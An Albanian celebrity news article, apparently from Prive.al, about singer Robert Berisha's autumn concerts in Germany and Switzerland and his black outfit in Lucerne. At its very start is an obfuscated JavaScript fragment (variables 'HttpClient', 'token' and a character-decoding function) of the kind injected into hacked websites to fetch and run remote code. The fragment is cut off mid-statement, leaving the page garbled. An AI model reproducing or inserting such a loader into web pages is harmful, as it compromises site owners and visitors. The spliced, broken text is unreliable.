;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Roberti vazhdon koncertet: Shfaqet plot stil në to!

By

Karrierën e pavarur si këngëtar e nisi vetëm pak muaj më parë me ‘Made in Albania’ për të vazhduar më pas me ‘Qysh pe lojna’.

Por, repertori minimalist i këngëve nuk e ka penguar Robert Berishën që t’i nisë koncertet në trojet ku flitet shqip dhe jo vetëm.

Me dy projekte muzikore të shndërruara në hite dhe aftësitë e pakontestueshme vokale prapa që nuk e kufizojnë në këngë tjera shqipe, Berisha koncertet nuk po i ndal as përgjatë muajve të vjeshtës.

Siç edhe e do rendi, pas verës, datat më të shpeshta janë në Gjermani e Zvicër ku Roberti ka performuar së fundmi.

Në Luzern ai ka ndezur atmosferën me interpretimin live por krahas kësaj, një gjë tjetër ka rënë në sy për shumë fanse të këngëtarit – stili.

I veshur thjeshtë, në të zezë, me pantallona të shqyer pak tek gjuri, setër dhe maicë, Roberti duket se ia ka qëlluar sërish falë edhe komenteve që si shpeshherë, lakmojnë e komplimentojnë Norën për personin e zemrës që ka në krah. /Prive.al/

Artikuj të ngjashëm